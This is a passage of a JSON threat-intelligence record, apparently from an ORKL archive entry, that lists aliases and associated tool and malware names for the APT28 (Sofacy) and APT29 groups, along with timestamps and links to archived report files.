				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434338,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.pdf",
		"text": "https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.txt",
		"img": "https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.jpg"
	}
}